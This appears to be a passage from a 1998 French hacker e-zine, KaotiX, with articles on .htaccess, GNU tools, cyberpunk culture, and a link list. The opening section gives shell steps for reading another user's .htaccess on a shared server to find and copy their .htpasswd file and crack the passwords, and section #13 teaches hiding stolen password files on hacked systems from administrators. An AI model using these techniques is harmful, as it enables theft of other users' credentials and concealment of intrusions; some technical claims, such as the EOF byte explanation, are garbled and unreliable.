/home/fred/web/.             sys    ..
/home/fred/web/..            sys    ..
/home/fred/web/.htaccess     fred   10Apr98
/home/fred/web/alien.htm     fred   20May98
/home/fred/web/bacc.htm      fred   22Feb98
/home/fred/web/born.gif      fred   01May98
/home/fred/web/boulot.gif    fred   01May98
/home/fred/web/cc.htm        fred   17Jan98
/home/fred/web/hash.gif      fred   19Mar98 
/home/fred/web/parano.gif    fred   30May98 
/home/fred/web/parano.htm    fred   15May98 
...

On note la presence du fichier .htaccess (visible uniquement avec l'option '-a' sur la commande 'ls'). Ce fichier va etre execute quand quelqu'un va demander l'acces a ce rep en utilisant le protocle 'http'... Si le visiteur ne met pas le bon nom de login et le bon pass il ne pourra pas acceder au rep en question (ni a ses sous rep!)

Le fichier .htaccess et ecrit comme suit:

AuthUserFile /home/user/conf/passwd/.htpasswd
AuthGroupFile /dev/null
AuthName ByPassword
AuthType Basic

<limit GET>
require valid-user
</Limit>      

En fait le fichier .htaccess n'est qu'un script qui va aller chercher les mots de pass dans le rep indique a la ligne "AuthUserFile..." soit ici dans le rep /home/user/conf/passwd/.htpasswd 

voila donc comment proceder pour trouver les pass d'un site protege via .htaccess. Il est toutefois necessaire d'avoir un acces telnet sur le meme serveur ...

Tjrs dans la meme optique du manque accru de vigileance dont font preuve les trois quarts des gens, on remarque que souvent ils laissent les reps de leur directory en r-x pour tous ... ce qui nous permet donc de lire facilement les fichiers contenus par ce rep...

Bon vous voulez aller voir ce qu'il y a derriere l'URL
http://machine.server.fr/~fred

malheureusement la procedure .htaccess vous demande un login et un pass(argg!!) pas de panik:) tout s'arrange avec un peu de tactik ....
loggez vous en telnet sur machine.server.fr

% cd /home/fred/web
% ls -al |grep .htaccess
rwxr-xr-x .htaccess  fred  22May98
% cat .htaccess >/home/mon_dir/htaccess_fred

voila vous venez de copier le .htaccess de fred sur votre homedir 
ou vous pourrez facilement le lire (heeh tout est une question de permission)Toute l'embrouille est que au lieu de le copier en faisant un 'cp' normal vous avez redirigez le 'stdout' vers le ficher 'htaccess_fred' dans votre homedir)

editez le maintenant avec vi et regardez ou se trouve le fichier .htpasswd (disons qu'il est dans /home/fred/conf/.htpasswd)
il y'a a peu pres une chance sur deux que fred est applique les meme restrictions a son rep ~/conf vous pouvez donc reiterez l'operation de la meme facon et avoir acces a ses mots de pass (qui seront encodes mais dont le decodage n'est pas tres long vu que le system les encode tjrs de la meme facon....)

==========================================
== Au fait comment creer un htaccess ?? ==
==========================================

hmm okay puisque vous insistez je vais vous expliquer comment creer une restriction d'acces sur son rep (valable seulement en http!)...

Bon avec la commande "AccessFileName" vous pourrez definir un fichier qui jouera le role de .htaccess (c'est la valeur par defaut de la variable "AccessFileName" sur les serveurs apache (et presque tous les autres aussi)...

% AccessFileName .fuck_da_keuf

ainsi c'est le fichier .fuck_da_keuf qui jouera le role de .htaccess
(vous pouvez de cette facon camoufler votre .htaccess pour que personne ne pense a faire ce que je viens d'expliker heeh.... le meilleur nom pour se fichier est 
sans doute quelques chose qui fait nom de fichier system... type: ".logconf" ou encore ".emacs_conf" ou encore ".bash" enfin vous voyez le style koi :)

Bon une fois votre AccessFileName parametre comme il faut vous devez creer le fichier qui va contenir les mots de passes.... celui ci ne DOIT PAS ETRE dans le repertoire ou se trouve le .htaccess! (mettons le dans /home/mon_rep/httpd par
exemple) Pour creer ce fichier (.htpasswd) on utilise le programme "htpasswd" (humm bizare y zont le meme nom ?!) Verfifiez au prealable que ce prog soit bien dans le rep /bin de votre system (auquel cas ca ne risque pas de marcher!)

la syntaxe est simple: on lance tout d'abord htpasswd avec le flag 
'-c' qui veut dire que le system va devoir creer un fichier passé en argument (suivit du premier nom d'utilisateur)

% htpasswd -c .htpasswd moi
Set password for moi:
retype password:

et voila vous pouvez maintenant editer .htpasswd 

% cat .htpasswd 
moi:ZyU8nMQpRyfIM

Pour ajouter de nouveaux utilisateurs il ne faut plus specifier le flag '-c' mais simplement 
%htpasswd .htpasswd utilisateur

et voila le fichier de mot de pass est créé reste a ecire le .htaccess (en fait .fuck_da_keuf) et a le placer dans le rep que l'on veut proteger)

hmmm petit conseil:
Pour eviter qu'un hacker n'est la meme idee que vous et vienne zoner dans le coin de votre .htpasswd vous pouvez rendre ce rep non executable:

%chmod u-rx /home/mon_rep/httpd
%ls -l | grep httpd
drwx------  httpd   moi

et voila il pourra pas y aller !! lol:)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#11#

              TOOLS FOR A
               ____    __    __   __  __
              / ___\  |  \  |  | |  ||  |
             / /      |   \ |  | |  ||  |
            | |    _  |    \   | |  ||  |
             \ \__| | |  |\    | |      |
              \____/  |__| \___|  \____/
                           
                                  GENERATION


-=[iXtlan]=-
  (k)1998


Bon si vous etes acroches a fenetre95 c'est pas la pein de lire ce qui suit! Non sans blaque! Le projet GNU est un environnement logiciel entierment dedie a Unix et plus precisement Linux....

hey non c'est pas GENERATION NEXT (y'a pas les spices girls la!!!)

C'est la Free Software Fondation (FSF) qui a developpe le projet GNU. il s'agit de tout un ensemble de logiciels entierement gratuits et dont les sources sont disponibles et modifiables pas n'importe qui (deja on s'eloigne de windows la)...La plus part des produits qui ont aboutis du projet GNU se retrouvenst sur les differentes distributions de Linux (RedHat, Debian, Kheops,..) mais sont 
completements adaptés aux plateformes unix les plus puissantes qui soit...

[plateforme]--- [ machine ] ---------[ company ]----------[web]
 SunOS           Sun Sparc        Sun Microsystem     www.sun.com
 Solaris         Sun Sparc        Sun Microsystem     www.sun.com
 HP-UX           HP 9000/700      Helwet Packard      www.hp.com
 AIX 3           IBM RS/6000      IBM                 www.ibm.com
 IRIX            SGI              Sillicon Graphics   www.sgi.com
 Digital Unix    DEC Alpha        Digital             www.digital.com

comme vous le voyez les programmes du projet GNU s'adaptent parfaitement aux machines puissantes et aux OS performants (on est carrement loin de winNT la!!!)
Mais encore mieux que cela les sources du GNU sont des programmes haut de gamme et souvent les plus evolues et les plus aboutis.
voici une liste de programmes du projet GNU

[programme] --------[ description ]
 GNU Emacs            editeur de texte 
 GCC                  compilateur C et C++
 GNU library          bibliotheques
 GDB                  debugger
 RCS                  outil de gestion de versions
 GNU make             gestion des compilations
 gprof                outil de mesure des performances

tous ces programmes sont implementes en serie sur la plus part des unix et sont extremement utilises dans le monde des programmeurs .... 
A quand un tel projet pour le monde windoze (koi ?? ki s'est qui a dit jamais!?:)

-----------
Note: pour en savoir plus lisez "programmer avec les outils GNU"
edition O'Reilly (c) 1997 
150frs (ouai je sais c'est cher mais bon y'a un CD avec tous les outils dessus!)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#12#                                                             iXtlan (k) 1998

              [   DA ]--[  CYBERPUNK  ]--[  REVOLUTION   ]
              [   DA ]--[  CYBERPUNK  ]--[  REVOLUTION   ]
              [   DA ]--[  CYBERPUNK  ]--[  REVOLUTION   ]
              [   DA ]--[  CYBERPUNK  ]--[  REVOLUTION   ]
              [   DA ]--[  CYBERPUNK  ]--[  REVOLUTION   ]
              [   DA ]--[  CYBERPUNK  ]--[  REVOLUTION   ]
              [   DA ]--[  CYBERPUNK  ]--[  REVOLUTION   ]


!!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! 
!!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! 
!!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! 
!!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! 


Le terme de cyberpunk designe la contre-culture qui naqui a la fin des annees 80' en reaction a la mollesse de la culture dominante: les Yuppies!

C'est Timothy Leary qui explique sans doute le mieux ce qu'est un cyberpunk dans son live "Chaos et Cyber culture" (editions du Lezard... tient c'est eux aussi qui ont edite des bookins comme "E comme Extacy" ou "Du chocolat a la morphine"...:) 
T. Leary concoit les choses de la facon suivante:
pour lui il y a tjrs eu dans l'histoire occidentale un CULTURE DOMINANTE et une CONTRE CULTURE (née en réaction a la premiere)
Mais plus interessant encore il compare l'evolution culturel et sociale de l'homme avec la vitesse a laquelle le cerveau est capable d'operer (vitesse de communication externe du cerveau)
voici le shema sur lequel il aboutit:

CONTRE
CULTURE       BEATNIKS            HIPPIES             CYBERPUNKS
---------   ------------        ------------         ------------
CULTURE     CONFORMISTES        GENS NORMAUX           YUPPIES
DOMINANTE
---------------------------------------------------------------------
            |                                               /
           1250                                     [internet]
            |                                          _/
            |                                        _/
            |                                  [realite virtuelle]
            |                                      /
PUISSANCE  1000                                 ,,/   
DU          |                                  /[scanner]
CERVEAU     |                                 / [multimedia 2D]
            |                                / 
=           |                              ./[CDrom]
            |                           ,,/[DOS]
REALITES   750                         / [VHS]
TRAITEES    |                   [ordi personnel]
PAR         |                      ,,,/
JOUR        |                 _,,,/
            |               ,/
            |             ;'[unix]
           500      [tv couleur]
            |        ,;/
            |     ,;/
            |   ,/[psychedeliques]
            | ,/
            |/
           250 [tv N&B]
---------------------------------------------------------------------
           1950         1965         1980             1993


Leary fait un rapprochement directe entre les differents moyens de communication existants (accessibles par un large public) et la vitesse a laquelle cerveau humain est capble de reagir... Il est vrai que l'homme moderne doit gerer dans un journee des plus banales tout un tas d'informations qui lui arrivent au cerveau
(spot de pub, conduite, micro informatik, GSM, internet,etc...) 

C'est la ou l'on voit se developper deux cultures differentes:

- La premiere: La CULTURE DOMINANTE integre les nouvelle     fonctionnalites du monde teknik dans le seul but de gagner un peu   plus de thune ou d'accroitre son pouvoir.

- La deuxieme: La CONTRE CULTURE elle essaye de maitriser les   nouvelles teknologies dans le but de parfaire son evolution,   d'aller plus vite, plus loins, mieux....

Il n'y a qu'a voir la facon dont l'informatik est enseigne dans les facultes et IUT pour se rendre compte de la "betise" dont fait preuve la culture Yuppie! 
Au lieu de nous faire decouvrir un monde, un rezo, un univers, un system, une pensee, ils nous inculquent sauvagement des principes mathematiques, des regles sociales, des concepts economiques, comme s'ils voulaient nous dresser a agir comme de sombre moutons...

Lors d'une discution avec le responsable du departement informatique d'un lieu dont je tairais le nom (oh et puis non! c'est l IUT de Nice dept info sous la tutelle de Jack Lemaire) voila ce que je me suis vu repondre lorsque j'approuvais mon desagrement quant aux methodes dont font preuves les profs: 
"L'IUT est la pour vous forger a la vie active, vous modeler dans la societe economique moderne!"
FUUUUUUUCKKKKKK non mais kel konnerie!!! et puis quoi encore !
"vous modeler" ??? non mais j'halucine ! Il est temp lecteur que tu te reveiles du commat dans lequel le monde occidental, moderne, developpe, teknokrat t'as plonge! Bordel c'est nous qui devons modeler la societe de demain et non celle d'hier qui doit faire de nous des zombies!!

voila pourquoi je refuse (et j'espere que toi aussi) le system universitaire europeen! les hackers sont le type meme des gens refusant la soumission a un ordre donne! Si on me dit que je ne doit pas aller a tel endroit comptes sur moi pour y etre dans les cinq minutes qui suivent!!!

voila c'etait le coup de gueule du cyberpunk (un peu stoned c'est vrai:) la suite dans le numero 2 de KaotiX (surment un article sur NEUROMANCIEN de William Gibson ;P hehe....


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#13#
                   ____________     _____
   _________      /            \___| ses |___________________
  |         |____/  planquer  ______              ___________\
  |  comment ________________/      |   données  /
  |_________|                       |___________/
                                                \
                                                 \   ___________
                                                  \ /          /
                                                   |iXtlan 1998]
                                                    \__________\


Il est fort probable qu'un jour dans votre vie vous ayez a cacher des donnees sur un system.... pourquoi ?? ben simplement parcque vous n'etes pas cense posseder ces donnees et qu'en attendant une expedition des dites donnees vers un lieu plus sur (diskette, zip, cdrom, etc.) vous devez les laisser sur le disk que vous venez de hacker... Imaginez la gueule de l'admin si il trouve dans votre homedir un fichier comportant tous les mots de passes de tous les utilisateurs du system??!!! ou bien une copy de son repetoir personnel avec la clef du root ?!!! hmmm vous risquez fort de 
recevoir vite fait un mail du dit admin qui sera pas content du tout (et pire si l'admin est un batard fini vous risquez de finir en taule!!)pas cool tout ca non? donc le mieux est de cacher les donnees extirpées chez autrui... suivant les OS il y'a plusieurs methodes:


**** Ou le cacher?

Il est evident qu'il vaut mieux cacher un fichier bien profond sur un disk plutot qu'a la racine meme du system! Donc si possible planquer votre fichier bien loin, dans plusieurs repetroire loin, loin, de la racine... En plus certain system lance dans l'autoexec.bat (ou l'equivalent) un scan de la racine donc rappellez vous bien ca: 
NE PLANQUEZ JAMAIS UN FILE A LA RACINE MEME D'UN DISK!

**** Comment le nommer?

Il arrive parfois que le fichier que vous devez cacher ne puisse pas etre renommer auquel cas placer le alors dans un rep qui fasse repertoir sys (type "TEMP" ou "SYS")... Bon si vous pouvez renommez le fichier alors utilisez un nom qui fasse la encore nom de fichier temporaire (*.tmp *.$$$) ou alors fichier system (reginfo.dat system.idx ....) si vous etes en fac le mieux et peut etre encore
un nom du style td_system.txt ou exo01.asm enfin quelque chose dans le style qui n'incitera pas un admin a aller regarder ce qu'il y a dedans! ceci dit eviter les fichier .txt de 50 Mo ou les .dll de 1Ko ca fait pas serieux et s'il l'admin a les yeux en face des trous il verra tout de suite l'astuce! 

Enfin il est recommander si c'est possible (dans le cas d'un fichier pass par ex)de crypter ce qu'il contient a l'aide d'un encodeur quelconque. A noter que l'encoder PGP permet d'insere un fichier quelconque dans un autre fichier bcp moins confidentiel (ex Jpeg, Gif, Bmp, etc...) cool non :)

**** cacher un fichier dans un autre fichier 
[merci NeurAlien!;)

Un fichier .txt se fini normalement par un  CR, LF (retour a la ligne) CR, LF en hexadecimal ca donne "0D 0A 1A"...
voici l'astuce qu'a trouve NeurAlien pour planquer du texte (ou meme un DLL ou une image ou koi que ce soit) dans un fichier txt!

editer le fichier text dans lequel vous voulez cacher l'autre fichier 
et ajouter "0D 0A 1A" a la fin puis le contenu du fichier a planque!
terrible !! ni EDIT ni TYPE ni un affichage avec un editeur n'affichera la fin du fichier!! comme koi un ordi quand on lui dit d'arreter de lire un texte il obeit au doigt et a l'oeil (heheh:)

voici en pratique ce que ca donne

(sous DOS)
% dir
fichier.txt   [fichier normal] 
secret.txt    [fichier a planquer]

voila comment faire

% edit fichier.txt

mettez du texte tout ce qu'il y a de plus anodin
patati patata ...XXX^Z

(remplacer les trois X par "0D 0A 1A" 
puis sauvegarder le fichier)	

% COPY fichier.txt + secret.txt /b readme.txt
% del secret.txt fichier.txt
% dir
readme.txt 

et voila personne ne verra rien a part peut etre la taille du fichier par rapport aux nombres de carracteres mais en general les admins ne sont pas assez futes pour aller chercher jusque la! ;-)

Sous unix les choses sont plus simples car les fichiers acceptent des noms tres tres longs avec tous les carracteres ascii possibles!
donc on peut creer un fichier facilement innacessible et y mettre ses codes penard (enfin faites gaffe qd meme on sait jamais!)

% cat "file    "
voici la liste complete des pass sur machine.server.fr 
hehe :)
^D
on vient donc de creer un fichier du nom de "file"
(enfin apparement en tout cas....)
Car l'admin qui va se pointer son nez histoire de voir vos dernieres bidouilles et lui y vas pas comprendre du tout! hehe:)
%ls -al
rwxr-xr-x  file    moi
%cat file
No such file or directory
%rm file
No such file or directory

hmmm hehehe voila l'astuce le fichier ne s'appelle pas "file" mais "file   " (avec les espaces) et ca ce con d'admin il peut pas le deviner!

Y'a aussi la possibilite sous unix de planquer ses donnees dans des rep caches 

% mkdir .rep

et voila le repetroire ".rep" n'est visible qu'avec l'option '-a'
le mieux etant encore de combiner le tout (rep cache, file cache, et nom avec espace et carracteres ascii en prime!)

voila pour aujourd'hui dans le prochain numero y'aura comment planquer des files dans un GIF ou un EXE (hehe interessant ca !) 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#14#              

                  ___   __  _  __  ____  ___   ____
            THE  / _ \ |  \| ||  || __ \/ _ \ |  _/ PROJECT
                /     \|     ||  ||    /     \| >_
               /___|___\_|\__||__||_|__\__|___\___\

                   ...for a free cyberspace....



Le projet ANIRAE est ne de mon esprit tordu (un soir un peu plus stoned que les autres surment)... je me suis dit que ce qui se passait dans ma tete par rapport au "grand rezo" devait aussi se passer dans la tete d'autres keums, sur la planete, ailleurs,... D'ou l'idee de donner naissance a un lieu de ralliement, une corporation des esprits "connected"...

"people got to get ... connected...." (Bjork)

C'est ca! etre connectes avec les autres "networked brains", pouvoir bouger, voyager, vivre a donf, tout en restant en relation avec d'autres gens dans le meme esprit que nous via l'Internet! Le projet ANIRAE n'est pas une organisation, encore moins une association et definitement pas une company! mais simplement une alliance (kind a union) entre divers nomades du rezo qui veulent avoir un endroit ou exprimer leur propos, parler de ce qui se passe dans leurs tetes, 
montrer leurs dernieres creations,...

Ces cyberpunks (voir article n°12) comme le dit Leary, doivent s'allier pour developper la contre-culture qui renversera le system de pensee teknokrate dans lequel le monde moderne est en train de s'engouffrer....

"Bow down before the one you serve 
 you gonna get what you deserve..." (NIN)

tel pourrait etre la devise de ces YUPPIES inclinés devant les lumieres mirobolantes du dieu Dollars. Mais heureusment il existe encore une minorité pensante sur terre, une contre culture capable de develloper des systems alternatifs (Linux), de communiquer rapidement via le rezo (mail et IRC), de propager son message artistique via les connexions numeriques mondiales (Live en RealAudio (GoodDog;-), infographie 2D/3D sur le rezo, texte et these online, 
....

Actuellement le projet ANIRAE est encore tres limité mais je compte sur vous lecteurs pour faire en sorte qu'il se developpe et deviennent vite un espace de rencontre et d'echange des "Networked Brains" (les esprits connectes!)Tout ce qui est digital peut faire partie du rezo (images, textes, sons, photos, films, fichiers divers, programmes, scripts,.....) 
Le site web sera bientot online sur http://anirae.azur.net/ et le channel IRC est deja ouvert #anirae sur UNDERNET. 

alors si ca vous chauffe de tenter une experience qui va vous faire directement plonger dans le XXIème siècle envoyez moi un mail (klh@mygale.org) avec un article coup de gueule, des conseils, des idees, des sons, des RBS, des images, tout ce que vous voulez pourvu que ce soit vous qui l'ayez fait!


Take a walk on da network!
a bientot sur le rezo...

                                             -=[ iXtlan ]=-
                                            (klh@mygale.org)


PS: dans le prochain numero de KaotiX je vous expliquerez d'ou vient toute cette philosophie chelou ;-) hehe 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#15#


                     _(((((((( + ))))))))))_
                   _(                       )_
                  (_      LINKZ ON DA WEB    _)
                    (_______________________)



voici quelques liens pas mal du tout a visiter soit pour leurs contenus hautement instructifs, ou pour les fichiers a downloader, ou simplement pour le fun...

[ HACK ] 
http://www.2600.com/ 	              
http://www.paranoia.com/
http://www.biodome.org/
http://www.EliteHackers.org/
http://www.micros0ft.com/
[francais]
http://rafale.certix.fr/~lloeb/main/underground.html
http://www.micronet.fr/~darcelf/
http://www.mygale.org/02/hckclan/


[ IRC ]
http://www.mygale.org/~klh
http://www.irc-scripts.org/
http://www.scriptingcrypt.com/
http://www.kombo.com/irc/
http://www.phantasy.com/~markm/bitchx/
http://scripts.bitchx.com/
http://irc.simplenet.com/

[ Linux ]
http://www.linux.org/
http://www.rootshell.com/
http://www.debian.org/
http://www.redhat.com/
http://www.linux-kheops.com/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#16#
                                ________
                             __/        \__
                            /              \
                         -=[ REMERCIEMENTS  ]=-
                            \_            _/
                              \_        _/
                                \      /
  _______________________________|    |______________________________
  @                                                                 @
  @  merci a....                                                    @
  @  NeurAlien et la Noway Team, 2600, hack-tic, Dan farme, Weste   @
  @  Venema, Sir Hackalot, Franken Gide, New Times, Hackers Corp,   @
  @  Teamothy Leary, William Gibson, HighTimes, GanjaMan, psyk0,    @
  @  delix, tot0, skel, bc, lahire (hahaha!), meat, pyramid, Linus  @
  @  Torvarld, les editions O'Reily (GNU) et MacMillan (Linux!),    @
  @  aussi #hackteach, #hack, #hackers, #klh_warscripts et #anirae  @
  @  et bien sur un grand merci a Bill Gates pour le rire qu'il fait@
  @  naitre en moi a chaque fois que je vois ca tronche!            @
  @_________________________________________________________________@
         


    Ce document a ete ecrit par iXtlan le 1er juin 98 (ptin le jour    ce leve!! non!... trop bon .... vite vite ou est mon gueu....lol:)


/!/ more infos at klh@mygale.org
/!/ http://anirae.azur.net
/!/ #anirae on Undrenet

 
 #######[]#################################################[]#######
 #######[   ---------------------------------------------   ]#######
 #######[  kopywrong (k) nEtWoRKed bRaiN hAcKeRs cOrp. 1998 ]#######
 #######[   ---------------------------------------------   ]#######
 #######[]#################################################[]#######


